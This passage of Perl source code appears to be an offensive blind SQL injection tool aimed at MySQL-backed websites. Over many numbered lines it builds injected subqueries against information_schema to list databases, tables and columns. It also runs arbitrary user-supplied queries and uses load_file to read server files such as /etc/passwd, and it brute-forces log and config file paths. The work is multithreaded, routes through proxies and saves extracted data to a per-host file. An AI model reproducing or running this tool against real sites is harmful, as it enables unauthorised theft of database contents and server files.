2203.             if ($bl_mode==0) {
2204.                    $bl_lenght = len_check();
2205.             } else {
2206.                    $bl_lenght = len_check1();
2207.             }
2208.      if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
2209.           print "Tables in DB [$choice]: $tab_num1 [length]:" .  $bl_lenght . "\n";
2210.           for ($ii = 1; $ii <= $bl_lenght; $ii++) {
2211.                if ($bl_mode==0) {
2212.                    $bl_table_number_NIS .= get_res_count();
2213.                } else {
2214.                    $bl_table_number_NIS .= get_res_count1();
2215.                }
2216.                 print $bl_table_number_NIS . "\r";
2217.                 sleep $pause;
2218.           }
2219.           print "\n------------------------------------------------------\n";
2220.           print "Tables in DB [$choice]: $tab_num1 [value]:" . $bl_table_number_NIS . "\n";
2221.           print "--------------------------------------------------------\n";
2222.      } else {
2223.           print "\n------------------------------------------------------\n";
2224.           print "Cant't get data...\n";
2225.           print "------------------------------------------------------\n";
2226.      }
2227.      $time = localtime;
2228.      print $time . "\n";
2229.      print "-----------------------------------\n";
2230.      ## start from2 ##
2231.      print FILE1  "-----------------------------------------\n";
2232.      print FILE1  "Tables in DB [$choice]:- $bl_table_number_NIS\n";
2233.      print FILE1  "-----------------------------------------\n";
2234.      print "Normal MODE - records > 10\n";
2235.      print "Fast MODE - records <= 10\n";
2236.      print "-----------------------------------------\n";
2237.      $thr = $kol_threads; # ???-?? ???????
2238.      $num = -1; # ?? ????????
2239.      ## end from2
2240.      print "Request method - $method\n";
2241.      print "Threads - $kol_threads\n";
2242.      print "Proxy - $proxy_message\n";
2243.      print "----------------------\n";
2244.      TABLES:
2245.      $time = localtime;
2246.      print $time . "\n";
2247.      print "-----------------------------------\n";
2248.      # ?????? DB #
2249.      $bl_lenght = "";
2250.      $ii = 0;
2251.      $s = 0;
2252.      $mflag = 0;
2253.      print "-----------------------------------\n";
2254.      for(0..$thr) {
2255.          $trl[$_] = threads->create(\&gets109999);
2256.      }
2257.      for(0..$thr) {
2258.          $trl[$_]->join;
2259.      }
2260.      sub gets109999 {
2261.         $| = 1;
2262.         while ($num < $bl_table_number_NIS) {
2263.             { lock($num);
2264.             $num++; }
2265.             $sss = $num;
2266.             $bl_current = "(select" . $bl_plus .  "table_name" . $bl_plus . "from" . $bl_plus . "information_schema.tables" . $bl_plus . "where" . $bl_plus . "table_schema=" . $bl_plus . $choice1 . $bl_plus . "limit" . $bl_plus . $num . ",1)";
2267.             if ($bl_mode==0) {
2268.                    $bl_lenght = len_check();
2269.             } else {
2270.                    $bl_lenght = len_check1();
2271.             }
2272.             if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
2273.                  print "\nTable limit $sss,1 [length]:" .  $bl_lenght . "\n";
2274.                  if ($mflag == 1) {
2275.                      ############################################################
2276.                      %aa = ();
2277.                      $aa = gets1000();
2278.                      $data1 = "";
2279.                      $data1 .= $aa->{$_},for sort {$a <=> $b} keys %$aa;
2280.                      #############################################################
2281.                  } else {
2282.                    $data1 = "";
2283.                    for ($ii = 1; $ii <= $bl_lenght; $ii++) {
2284.                     if ($bl_mode==0) {
2285.                          $data1 .= chr(get_res_normal());
2286.                     } else {
2287.                          $data1 .= chr(get_res_normal1());
2288.                     }
2289.                       print $data1 . "\r";
2290.                    }
2291.                  }
2292.                  print "\n-----------------------------------\n";
2293.                  print "  ---> Table limit $sss,1: " . $data1 . "\n";
2294.                  print "-----------------------------------\n";
2295.                  print FILE1 "  ---> Table limit $sss,1: " . $data1 . "\n";
2296.                  $data = "";
2297.             }
2298.             sleep $pause;
2299.         }
2300.     }
2301.     print "----------\n";
2302.     print "Saved in " . "z_" . $host3 . ".txt\n";
2303.     close(FILE1);
2304.     goto START10;
2305. } # end tables from DB names
2306. #######################################################################################################################################################################################
2307. # Blind some query
2308. if ($choice==4) {
2309.      open( FILE1, ">>" . "z_" .$host3 . ".txt" ); # ???? ??? ?????? ???????????
2310.      $bl_table_number_NIS = "";
2311.      $choice100 =  "";
2312.      $choice200 =  "";
2313.      $choice300 = "";
2314.   if(!$bl_your_query) {
2315.      print "\$bl_your_query is empty in code\n";
2316.      print "Enter your query, example - concat_ws(0x3a,table_schema,table_name)\n\n";
2317.      $choice100 = <STDIN>;
2318.      chomp  $choice100;
2319.      print "\n\nEnter condition, without LIMIT [auto count]!!! Example: +from+information_schema.tables+where+table_name+like+0x7573657273 (if NOT- press ENTER):\n\n";
2320.      $choice200 = <STDIN>;
2321.      chomp  $choice200;
2322.   } else {
2323.      $choice100 =  $bl_your_query;
2324.      $choice200 =  $bl_from;
2325.   }
2326.      $choice300 = $choice100 . $choice200;
2327.      print "---------------------------------------------------------------------------------------------------------------------------------------\n";
2328.      print "your query: (select(". $choice100 . ")" . $choice200 . ")\n";
2329.      print "---------------------------------------------------------------------------------------------------------------------------------------\n";
2330.      $bl_lenght = "";
2331.      $ii = 0;
2332.      $bl_current = "(select(count(" . $choice100 . "))" . $choice200 . ")";
2333.             if ($bl_mode==0) {
2334.                    $bl_lenght = len_check();
2335.             } else {
2336.                    $bl_lenght = len_check1();
2337.             }
2338.      if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
2339.           print "Count records for your answer[length]:" .  $bl_lenght . "\n";
2340.           for ($ii = 1; $ii <= $bl_lenght; $ii++) {
2341.                if ($bl_mode==0) {
2342.                    $bl_table_number_NIS .= get_res_count();
2343.                } else {
2344.                    $bl_table_number_NIS .= get_res_count1();
2345.                }
2346.                 print $bl_table_number_NIS . "\r";
2347.                 sleep $pause;
2348.           }
2349.           print "\n------------------------------------------------------\n";
2350.           print "Count records for your answer[value]:" . $bl_table_number_NIS . "\n";
2351.           print "--------------------------------------------------------\n";
2352.      } else {
2353.           print "\n------------------------------------------------------\n";
2354.           print "Cant't get data...\n";
2355.           print "------------------------------------------------------\n";
2356.      }
2357.      ## ???????? ##
2358.      $time = localtime;
2359.      print $time . "\n";
2360.      print "-----------------------------------\n";
2361.      $thr = $kol_threads; # ???-?? ???????
2362.      if($bl_table_number_NIS == 1) {
2363.         $num = 0; # ?? ????????
2364.      } else {$num = -1}
2365.      print "Request method - $method\n";
2366.      print "Threads - $kol_threads\n";
2367.      print "Proxy - $proxy_message\n";
2368.      print "----------------------\n";
2369.      $bl_lenght = "";
2370.      $ii = 0;
2371.      $s = 0;
2372.      $mflag = 0;
2373.      print "-----------------------------------\n";
2374.      for(0..$thr) {
2375.          $trl[$_] = threads->create(\&gets102222);
2376.      }
2377.      for(0..$thr) {
2378.          $trl[$_]->join;
2379.      }
2380.      sub gets102222 {
2381.         $| = 1;
2382.         while ($num < $bl_table_number_NIS) {
2383.             { lock($num);
2384.             $num++; }
2385.             $sss = $num;
2386.             if ($bl_table_number_NIS>1){
2387.                $bl_current = "(select(" . $choice100 . ")" . $choice200 . $bl_plus . "limit" . $bl_plus . $num . ",1)";
2388.             } else {
2389.                $bl_current = "(select(" . $choice100 . ")" . $choice200 . ")";
2390.             }
2391.             if ($bl_mode==0) {
2392.                    $bl_lenght = len_check();
2393.             } else {
2394.                    $bl_lenght = len_check1();
2395.             }
2396.             if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
2397.                  print "\nAnswer[length]:" .  $bl_lenght . "\n";
2398.                  if ($mflag == 1) {
2399.                      ############################################################
2400.                      %aa = ();
2401.                      $aa = gets1000();
2402.                      $data1 = "";
2403.                      $data1 .= $aa->{$_},for sort {$a <=> $b} keys %$aa;
2404.                      #############################################################
2405.                  } else {
2406.                    $data1 = "";
2407.                    for ($ii = 1; $ii <= $bl_lenght; $ii++) {
2408.                     if ($bl_mode==0) {
2409.                          $data1 .= chr(get_res_normal());
2410.                     } else {
2411.                          $data1 .= chr(get_res_normal1());
2412.                     }
2413.                       print $data1 . "\r";
2414.                    }
2415.                  }
2416.                  print "\n-----------------------------------\n";
2417.                  print " Answer limit $sss,1 --->  " . $data1 . "\n";
2418.                  print "-----------------------------------\n";
2419.                  print FILE1 " Answer limit $sss,1 ---> " . $data1 . "\n";
2420.                  $data = "";
2421.             }
2422.             sleep $pause;
2423.         }
2424.     }
2425.     print "----------\n";
2426.     print "Saved in " . "z_" . $host3 . ".txt\n";
2427.     close(FILE1);
2428.     goto START10;
2429. } # end some query
2430. #########################################################################################################################################################
2431. # Blind columns from tables from DB names
2432. if ($choice==5) {
2433.      open( FILE1, ">>" . "z_" .$host3 . ".txt" ); # ???? ??? ?????? ???????????
2434.      $bl_table_number_NIS = "";
2435.      print "-----------------------------------------\n";
2436.      print "Enter the DB-name: ";
2437.      $choice = <STDIN>;
2438.      chomp $choice;
2439.      if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}
2440.      print "DB-name: $choice\n";
2441.      print "----------\n";
2442.      $choice1 = ascii_to_hex $choice;
2443.      print "-----------------------------------------\n";
2444.      print "Enter the TABLE-name: ";
2445.      $choice2 = <STDIN>;
2446.      chomp $choice2;
2447.      if ($choice2 =~ m/-/imgs) {$choice2 = "`" . $choice2 . "`"}
2448.      print "TABLE-name: $choice2\n";
2449.      print "----------\n";
2450.      $choice3 = ascii_to_hex $choice2;
2451.      ## ???????? ##
2452.      $bl_lenght = "";
2453.      $ii = 0;
2454.      $bl_current = "(select" . $bl_plus .  "count(column_name)" . $bl_plus . "from" . $bl_plus . "information_schema.columns" . $bl_plus . "where" . $bl_plus . "table_name=" . $choice3 . $bl_plus . "and" . $bl_plus . "table_schema=" . $plus . $choice1 . ")";
2455.             if ($bl_mode==0) {
2456.                    $bl_lenght = len_check();
2457.             } else {
2458.                    $bl_lenght = len_check1();
2459.             }
2460.      if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
2461.           print "Columns in [$choice.$choice2] [length]:" .  $bl_lenght . "\n";
2462.           for ($ii = 1; $ii <= $bl_lenght; $ii++) {
2463.                if ($bl_mode==0) {
2464.                    $bl_table_number_NIS .= get_res_count();
2465.                } else {
2466.                    $bl_table_number_NIS .= get_res_count1();
2467.                }
2468.                 print $bl_table_number_NIS . "\r";
2469.                 sleep $pause;
2470.           }
2471.           print "\n------------------------------------------------------\n";
2472.           print "Columns in [$choice.$choice2] [value]:" . $bl_table_number_NIS . "\n";
2473.           print "--------------------------------------------------------\n";
2474.      } else {
2475.           print "\n------------------------------------------------------\n";
2476.           print "Cant't get data...\n";
2477.           print "------------------------------------------------------\n";
2478.      }
2479.      $time = localtime;
2480.      print $time . "\n";
2481.      print "-----------------------------------\n";
2482.      ## start from2 ##
2483.      print FILE1  "-----------------------------------------\n";
2484.      print FILE1  "Columns in [$choice.$choice2]: - $bl_table_number_NIS\n";
2485.      print FILE1  "-----------------------------------------\n";
2486.      print "Normal MODE - records > 10\n";
2487.      print "Fast MODE - records <= 10\n";
2488.      print "-----------------------------------------\n";
2489.      $thr = $kol_threads; # ???-?? ???????
2490.      $num = -1; # ?? ????????
2491.      ## end from2
2492.      print "Request method - $method\n";
2493.      print "Threads - $kol_threads\n";
2494.      print "Proxy - $proxy_message\n";
2495.      print "----------------------\n";
2496.      TABLES:
2497.      $time = localtime;
2498.      print $time . "\n";
2499.      print "-----------------------------------\n";
2500.      # ?????? DB #
2501.      $bl_lenght = "";
2502.      $ii = 0;
2503.      $s = 0;
2504.      $mflag = 0;
2505.      print "-----------------------------------\n";
2506.      for(0..$thr) {
2507.          $trl[$_] = threads->create(\&gets102333);
2508.      }
2509.      for(0..$thr) {
2510.          $trl[$_]->join;
2511.      }
2512.      sub gets102333 {
2513.         $| = 1;
2514.         while ($num < $bl_table_number_NIS) {
2515.             { lock($num);
2516.             $num++; }
2517.             $sss = $num;
2518.             $bl_current = "(select" . $bl_plus .  "column_name" . $bl_plus . "from" . $bl_plus . "information_schema.columns" . $bl_plus . "where" . $bl_plus . "table_name=" . $choice3 . $bl_plus . "and" . $bl_plus . "table_schema=" . $plus . $choice1 . $bl_plus . "limit" . $bl_plus . $num . ",1)";
2519.             if ($bl_mode==0) {
2520.                    $bl_lenght = len_check();
2521.             } else {
2522.                    $bl_lenght = len_check1();
2523.             }
2524.             if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
2525.                  print "\nColumn limit $sss,1 [length]:" .  $bl_lenght . "\n";
2526.                  if ($mflag == 1) {
2527.                      ############################################################
2528.                      %aa = ();
2529.                      $aa = gets1000();
2530.                      $data1 = "";
2531.                      $data1 .= $aa->{$_},for sort {$a <=> $b} keys %$aa;
2532.                      #############################################################
2533.                  } else {
2534.                    $data1 = "";
2535.                    for ($ii = 1; $ii <= $bl_lenght; $ii++) {
2536.                     if ($bl_mode==0) {
2537.                          $data1 .= chr(get_res_normal());
2538.                     } else {
2539.                          $data1 .= chr(get_res_normal1());
2540.                     }
2541.                       print $data1 . "\r";
2542.                    }
2543.                  }
2544.                  print "\n-----------------------------------\n";
2545.                  print "  ---> Column limit $sss,1: " . $data1 . "\n";
2546.                  print "-----------------------------------\n";
2547.                  print FILE1 "  ---> Column limit $sss,1: " . $data1 . "\n";
2548.                  $data = "";
2549.             }
2550.             sleep $pause;
2551.         }
2552.     }
2553.     print "----------\n";
2554.     print "Saved in " . "z_" . $host3 . ".txt\n";
2555.     close(FILE1);
2556.     goto START10;
2557. } # end columns from tables from DB names
2558. # blind LOAD_FILE log/conf BRUTE
2559. if ($choice==7) {
2560.        open( FILE1, ">>" . "z_" .$host3 . ".txt" ); # ???? ??? ?????? ???????????
2561.        $bl_lenght=0;  
2562.        print "   Brute log/conf files\n";
2563.        print "   -------------\n";
2564.        print FILE1 "   Brute log/conf files\n";
2565.        print FILE1 "   -------------\n";
2566.        open(FILE, "<", $lrl_list);
2567.        while(<FILE>) {
2568.          chomp;
2569.          push(@lrl_list, $_);
2570.        }
2571.        close(FILE);
2572.        $size = 0;
2573.        $size = @lrl_list;
2574.        print "File: $lrl_list\n";
2575.        print "Paths: $size\n";
2576.        print "-------------\n";
2577.        print "Request method - $method\n";
2578.        print "Threads - $kol_threads\n";
2579.        print "Proxy - $proxy_message\n";
2580.        print "----------------------\n";
2581.        $thr = $kol_threads; # ???-?? ???????
2582.        $num = -1; # ?? ????????
2583.        for(0..$thr) {
2584.             $trl[$_] = threads->create(\&gets996655);
2585.        }
2586.        for(0..$thr) {
2587.             $trl[$_]->join;
2588.        }
2589.        sub gets996655 {
2590.             $| = 1;
2591.             while ($num<$size) {
2592.                { lock($num);
2593.                $num++; }
2594.                $choice1111  = '/'.$lrl_list[$num];
2595.                $choice2222 = ascii_to_hex $choice1111;
2596.                print $choice1111 . "\n";
2597.                $bl_lenght = "";
2598.                $bl_current = "length(load_file(" . $choice2222 .  "))";
2599.                if ($bl_mode==0) {
2600.                    $bl_lenght = len_check();
2601.                } else {
2602.                    $bl_lenght = len_check1();
2603.                }
2604.                if  (($bl_lenght >= 2)) {
2605.                     print "   ---> " . $choice1111 . "\n";
2606.                     print FILE1 "  "  . $choice1111 . "\n";
2607.                }
2608.                $bl_lenght=0;
2609.                print $num . "\r";
2610.                sleep $pause;
2611.  
2612.             }
2613.        }
2614.     print "----------\n";
2615.     print "Saved in " . "z_" . $host3 . ".txt\n";
2616.     close(FILE1);
2617.     goto START10;
2618. } # end blind LOAd_FILE BRUTE
2619. # blind LOAd_FILE
2620. if ($choice==6) {
2621.      open( FILE1, ">>" . "z_" .$host3 . ".txt" ); # ???? ??? ?????? ???????????
2622.      $bl_table_number_NIS = "";
2623.      print "-----------------------------------------\n";
2624.      print "Enter file name (example: /etc/passwd): ";
2625.      $choice = <STDIN>;
2626.      chomp $choice;
2627.      print "File name for read: $choice\n";
2628.      $choice1 = ascii_to_hex $choice;
2629.      ## ???????? ##
2630.      $bl_lenght = "";
2631.      $ii = 0;
2632.      $bl_current = "length(load_file(" . $choice1 .  "))";
2633.             if ($bl_mode==0) {
2634.                    $bl_lenght = len_check();
2635.             } else {
2636.                    $bl_lenght = len_check1();
2637.             }
2638.      if  (($bl_lenght >= 2)) {
2639.           print "File [$choice] size [length]:" .  $bl_lenght . "\n";
2640.           for ($ii = 1; $ii <= $bl_lenght; $ii++) {
2641.                if ($bl_mode==0) {
2642.                    $bl_table_number_NIS .= get_res_count();
2643.                } else {
2644.                    $bl_table_number_NIS .= get_res_count1();
2645.                }
2646.                 print $bl_table_number_NIS . "\r";
2647.                 sleep $pause;
2648.           }
2649.           print "\n------------------------------------------------------\n";
2650.           print "File [$choice] size: - $bl_table_number_NIS bytes\n";
2651.           print "--------------------------------------------------------\n";
2652.      } else {
2653.           print "\n------------------------------------------------------\n";
2654.           print "Cant't get data...\n";
2655.           print "------------------------------------------------------\n";
2656.           close(FILE1);
2657.           goto START10;
2658.      }
2659.      $time = localtime;
2660.      print $time . "\n";
2661.      ## start from2 ##
2662.      print FILE1  "-----------------------------------------\n";
2663.      print FILE1  "File [$choice] size: - $bl_table_number_NIS bytes\n";
2664.      print FILE1  "-----------------------------------------\n";
2665.      # ?????? ???? #
2666.      $thr = $kol_threads; # ???-?? ???????
2667.      $num = -1; # ?? ????????
2668.      ## end from2
2669.      print "Request method - $method\n";
2670.      print "Threads - $kol_threads\n";
2671.      print "Proxy - $proxy_message\n";
2672.      print "----------------------\n";
2673.      TABLES:
2674.      $time = localtime;
2675.      print $time . "\n";
2676.      print "-----------------------------------\n";
2677.      # ?????? DB #
2678.      $bl_lenght = "";
2679.      $ii = 0;
2680.      $s = 0;
2681.      $mflag = 0;
2682.      print "-----------------------------------\n";
2683.      $bl_current = "(load_file(" . $choice1 .  "))";
2684.      %aa = ();
2685.      $aa = load_file();
2686.      $data1000 = "";
2687.      $data1000 .= $aa->{$_},for sort {$a <=> $b} keys %$aa;
2688.      print FILE1 $data1000;
2689.      sub load_file {
2690.          $thr = $kol_threads; # ???-?? ???????
2691.          print "Get ALL file ($bl_table_number_NIS) or PART of file ? (1/0): ";
2692.          $choice = <STDIN>;
2693.          chomp $choice;
2694.          if ($choice == 1) {
2695.              $num = -1; # ?? ????????
2696.          } else {
2697.              print "Enter START byte: ";
2698.              $choice1 = <STDIN>;
2699.              chomp $choice1;
2700.              $num = $choice1-2;
2701.              print "Enter END byte: ";
2702.              $choice2 = <STDIN>;
2703.              chomp $choice2;
2704.              $bl_table_number_NIS = $choice2;
2705.              print "Dump bytes of file from [" . ($num+2) . "] to [" . ($bl_table_number_NIS) . "]\n";
2706.          }
2707.          print "-----------------------------------------\n";
2708.          ## end from2
2709.          %res1 = ();
2710.          for(0..$thr) {
2711.              $trl[$_] = threads->create(\&gets102444);
2712.          }
2713.          for(0..$thr) {
2714.              %res1 = (%res1, %{$trl[$_]->join});
2715.          }
2716.          sub gets102444 {
2717.              $data2 = "";
2718.              $| = 1;
2719.              while ($num < $bl_table_number_NIS) {
2720.                    { lock($num);
2721.                    $num++; }
2722.                    $ii = $num;
2723.                    if ($bl_mode==0){
2724.                         $data2 = chr(get_res_normal());
2725.                    } else {
2726.                         $data2 = chr(get_res_normal1());
2727.                    }
2728.                    $hash1{$ii} = $data2;
2729.                    print $data2;
2730.              }
2731.              return \%hash1
2732.          }
2733.          return \%res1;
2734.     }
2735.     print "----------\n";
2736.     print "Saved in " . "z_" . $host3 . ".txt\n";
2737.     close(FILE1);
2738.     goto START10;
2739. } # end blind LOAd_FILE
2740. if ($choice==8) {
2741.      open( FILE1, ">>" . "z_" .$host3 . ".txt" ); # ???? ??? ?????? ???????????
2742.      print "-----------------------------------\n";
2743.      ## ???????? ##
2744.      $bl_lenght = "";
2745.      $ii = 0;
2746.      $bl_current = "(select" . $bl_plus .  "count(table_name)" . $bl_plus . "from" . $bl_plus . "information_schema.tables" . $bl_plus . "where" . $bl_plus . "table_schema!=0x696e666f726d6174696f6e5f736368656d61)";
2747.             if ($bl_mode==0) {
2748.                    $bl_lenght = len_check();
2749.             } else {
2750.                    $bl_lenght = len_check1();
2751.             }
2752.      if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
2753.           print "Count tables NOT in information_schema [length]:" .  $bl_lenght . "\n";
2754.           for ($ii = 1; $ii <= $bl_lenght; $ii++) {
2755.                if ($bl_mode==0) {
2756.                    $bl_table_number_NIS .= get_res_count();
2757.                } else {
2758.                    $bl_table_number_NIS .= get_res_count1();
2759.                }
2760.                 print $bl_table_number_NIS . "\r";
2761.                 sleep $pause;
2762.           }
2763.           print "\n------------------------------------------------------\n";
2764.           print "Count tables NOT in information_schema [value]:" . $bl_table_number_NIS . "\n";
2765.           print "--------------------------------------------------------\n";
2766.      } else {
2767.           print "\n------------------------------------------------------\n";
2768.           print "Cant't get data...\n";
2769.           print "------------------------------------------------------\n";
2770.      }
2771.      $time = localtime;
2772.      print $time . "\n";
2773.      print "-----------------------------------\n";
2774.      ## start from2 ##
2775.      print FILE1  "-----------------------------------------\n";
2776.      print FILE1  "Tables - $bl_table_number_NIS\n";
2777.      print FILE1  "-----------------------------------------\n";
2778.      print "Normal MODE - records > 10\n";
2779.      print "Fast MODE - records <= 10\n";
2780.      print "-----------------------------------------\n";
2781.      print "Get ALL tables ($bl_table_number_NIS) ? (1/0): ";
2782.      $choice = <STDIN>;
2783.      chomp $choice;
2784.      $thr = $kol_threads; # ???-?? ???????
2785.      if ($choice == 1) {
2786.           $num = -1; # ?? ????????
2787.      } else {
2788.           print "Enter START_position: ";
2789.           $choice1 = <STDIN>;
2790.           chomp $choice1;
2791.           $num = $choice1-2;
2792.           print "Enter END_position: ";
2793.           $choice2 = <STDIN>;
2794.           chomp $choice2;
2795.           $bl_table_number_NIS = $choice2-1;
2796.           print "Dump records from [" . ($num+2) . "] to [" . ($bl_table_number_NIS+1) . "]\n";
2797.      }
2798.      print "-----------------------------------------\n";
2799.      ## end from2
2800.      print "Request method - $method\n";
2801.      print "Threads - $kol_threads\n";
2802.      print "Proxy - $proxy_message\n";
2803.      print "----------------------\n";
2804.      TABLES:
2805.      $time = localtime;
2806.      print $time . "\n";
2807.      print "-----------------------------------\n";
2808.      # ?????? ??????? #
2809.      $bl_lenght = "";
2810.      $ii = 0;
2811.      $s = 0;
2812.      $mflag = 0;
2813.      print "-----------------------------------\n";
2814.      for(0..$thr) {
2815.          $trl[$_] = threads->create(\&gets102);
2816.      }
2817.      for(0..$thr) {
2818.          $trl[$_]->join;
2819.      }
2820.      sub gets102 {
2821.         $| = 1;
2822.         while ($num < $bl_table_number_NIS) {
2823.             { lock($num);
2824.             $num++; }
2825.             $sss = $num;
2826.             $bl_current = "(select" . $bl_plus .  "table_name" . $bl_plus . "from" . $bl_plus . "information_schema.tables" . $bl_plus . "where" . $bl_plus . "table_schema!=0x696e666f726d6174696f6e5f736368656d61" . $bl_plus . "limit" . $bl_plus . $num . ",1)";
2827.             if ($bl_mode==0) {
2828.                    $bl_lenght = len_check();
2829.             } else {
2830.                    $bl_lenght = len_check1();
2831.             }
2832.             if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
2833.                  print "\ntable limit $sss,1 [length]:" .  $bl_lenght . "\n";
2834.                  if ($mflag == 1) {
2835.                      ############################################################
2836.                      %aa = ();
2837.                      $aa = gets1000();
2838.                      $data1 = "";
2839.                      $data1 .= $aa->{$_},for sort {$a <=> $b} keys %$aa;
2840.                      #############################################################
2841.                  } else {
2842.                    $data1 = "";
2843.                    for ($ii = 1; $ii <= $bl_lenght; $ii++) {
2844.                     if ($bl_mode==0) {
2845.                          $data1 .= chr(get_res_normal());
2846.                     } else {
2847.                          $data1 .= chr(get_res_normal1());
2848.                     }
2849.                       print $data1 . "\r";
2850.                    }
2851.                  }
2852.                  print "\n-----------------------------------\n";
2853.                  print "  ---> table limit $sss,1: " . $data1 . "\n";
2854.                  print "-----------------------------------\n";
2855.                  print FILE1 "  ---> table limit $sss,1: " . $data1 . "\n";
2856.                  $data = "";
2857.             }
2858.             sleep $pause;
2859.         }
2860.     }
2861.     print "----------\n";
2862.     print "Saved in " . "z_" . $host3 . ".txt\n";
2863.     close(FILE1);
2864.     goto START10;
2865. }
2866. if ($choice==9) {
2867.     sub ascii_to_hex ($) {
2868.                (my $str = shift) =~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;
2869.                $str = "0x" . $str;
2870.              return $str;
2871.     }
2872.     open( FILE1, ">>" . "z_" .$host3 . ".txt" ); # ???? ??? ?????? ???????????
2873.     print "-----------------------------------------\n";
2874.     print "Enter the table_name: ";
2875.     $choice = <STDIN>;
2876.     chomp $choice;
2877.     if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}
2878.     print "Table: $choice\n";
2879.     print "----------\n";
2880.     print FILE1  "-----------------------------------------\n";
2881.     print FILE1  "Table [ $choice ]\n";
2882.     print FILE1  "-----------------------------------------\n";
2883.     COLUMNS:
2884.     $table_name = $choice;
2885.     $table_name1 = ascii_to_hex $table_name;
2886.     # ?????? ???-?? ??????? ? ??????? #
2887.     print "-----------------------------------\n";
2888.     ## ???????? ##
2889.     $bl_lenght = "";
2890.     $ii = 0;
2891.     $bl_column_number = "";
2892.     $bl_current = "(select" . $bl_plus .  "count(column_name)" . $bl_plus . "from" . $bl_plus . "information_schema.columns" . $bl_plus . "where" . $bl_plus . "table_name=" . $table_name1 . ")";
2893.             if ($bl_mode==0) {
2894.                    $bl_lenght = len_check();
2895.             } else {
2896.                    $bl_lenght = len_check1();
2897.             }
2898.     if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
2899.         print "Count columns from $table_name [length]:" .  $bl_lenght . "\n";
2900.         ############################################################
2901.         for ($ii = 1; $ii <= $bl_lenght; $ii++) {
2902.                if ($bl_mode==0) {
2903.                    $bl_column_number .= get_res_count();
2904.                } else {
2905.                    $bl_column_number .= get_res_count1();
2906.                }
2907.                 print $bl_column_number . "\r";
2908.                 sleep $pause;
2909.         }
2910.         print "\n------------------------------------------------------\n";
2911.         print "Count columns from $table_name [value]:" . $bl_column_number . "\n";
2912.         print "--------------------------------------------------------\n";
2913.         if ($bl_column_number <=10 ) {
2914.               print "Fast MODE - records <= 10\n";
2915.         } else {
2916.               print "Normal MODE - records > 10\n";
2917.         }
2918.         print "--------------------------------------------------------\n";
2919.         print FILE1 "Count columns from $table_name:" . $bl_column_number . "\n";
2920.      } else {
2921.         print "\n------------------------------------------------------\n";
2922.         print "Cant't get data...\n";
2923.         print "------------------------------------------------------\n";
2924.      }
2925.      $mflag = 0;
2926.      print "-----------------------------------\n";
2927.      $time = localtime;
2928.      print $time . "\n";
2929.      print "-----------------------------------\n";
2930.     ## ?????? ??????? ##
2931.     print "Request method - $method\n";
2932.     print "Threads - $kol_threads\n";
2933.     print "Proxy - $proxy_message\n";
2934.     print "----------------------\n";
2935.     # ?????? ??????? #
2936.     print "----------------------------------------------\n";
2937.     $thr = $kol_threads; # ???-?? ???????
2938.     $num = -1; # ?? ????????
2939.     $bl_lenght = "";
2940.     $ii = 0;
2941.     $s = 0;
2942.     print "Get columns from $table_name:\n";
2943.     print "-------------------------------------------------------------\n";
2944.     for(0..$thr) {
2945.        $trl[$_] = threads->create(\&gets103);
2946.     }
2947.     for(0..$thr) {
2948.        $trl[$_]->join;
2949.     }
2950.     $time = localtime;
2951.     print $time . "\n";
2952.     sub gets103 {
2953.         $| = 1;
2954.         while ($num < $bl_column_number) {
2955.             { lock($num);
2956.             $num++; }
2957.             $sss = $num;
2958.             $bl_current = "(select" . $bl_plus .  "column_name" . $bl_plus . "from" . $bl_plus . "information_schema.columns" . $bl_plus . "where" . $bl_plus . "table_name=" . $table_name1 . $bl_plus . "limit" . $bl_plus . $num . ",1)";
2959.             if ($bl_mode==0) {
2960.                    $bl_lenght = len_check();
2961.             } else {
2962.                    $bl_lenght = len_check1();
2963.             }
2964.             if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
2965.                  print "\ncolumn limit $sss,1 [length]:" .  $bl_lenght . "\n";
2966.                  if ($mflag == 1) {
2967.                      ############################################################
2968.                      %aa = ();
2969.                      $aa = gets1000();
2970.                      $data1 = "";
2971.                      $data1 .= $aa->{$_},for sort {$a <=> $b} keys %$aa;
2972.                      #############################################################
2973.                  } else {
2974.                    $data1 = "";
2975.                    for ($ii = 1; $ii <= $bl_lenght; $ii++) {
2976.                     if ($bl_mode==0) {
2977.                          $data1 .= chr(get_res_normal());
2978.                     } else {
2979.                          $data1 .= chr(get_res_normal1());
2980.                     }
2981.                       print $data1 . "\r";
2982.                    }
2983.                  }
2984.                  print "\n-----------------------------------\n";
2985.                  print "  ---> column limit $sss,1: " . $data1 . "\n";
2986.                  print "-----------------------------------\n";
2987.                  print FILE1 "  ---> column limit $sss,1: " . $data1 . "\n";
2988.                  $data = "";
2989.             }
2990.             sleep $pause;
2991.         }
2992.     }
2993.     print FILE1 "----------\n";
2994.     print "----------\n";
2995.     print "Saved in " . "z_" . $host3 . ".txt\n";
2996.     close(FILE1);
2997.     goto START10;
2998. }
2999. if ($choice==10) {
3000.     $schema_flag = 0;
3001.     sub ascii_to_hex ($) {
3002.                (my $str = shift) =~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;
3003.                $str = "0x" . $str;
3004.              return $str;
3005.     }
3006.     open( FILE1, ">>" . "z_" .$host3 . ".txt" ); # ???? ??? ?????? ???????????
3007.     print "-----------------------------------------\n";
3008.     print "Enter the table_name: ";
3009.     $choice = <STDIN>;
3010.     chomp $choice;
3011.     if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}
3012.     $table_name = $choice;
3013.     $table_name1 = ascii_to_hex $table_name;
3014.     print "-----------------------------------------\n";
3015.     print "MySQL>=5 or MySql<5? (1/0): ";
3016.     $choice = <STDIN>;
3017.     chomp $choice;
3018.     if ($choice == 1) {
3019.          BL_TABLE_SCHEMA:
3020.          $schema_flag = 1;
3021.          print "-----------------------------------------------------\n";
3022.          print "Getting table_schema for $table_name, wait please... \n";
3023.          print "-----------------------------------------------------\n";
3024.          $bl_lenght = "";
3025.          $bl_table_schema = "";
3026.          $ii = 0;
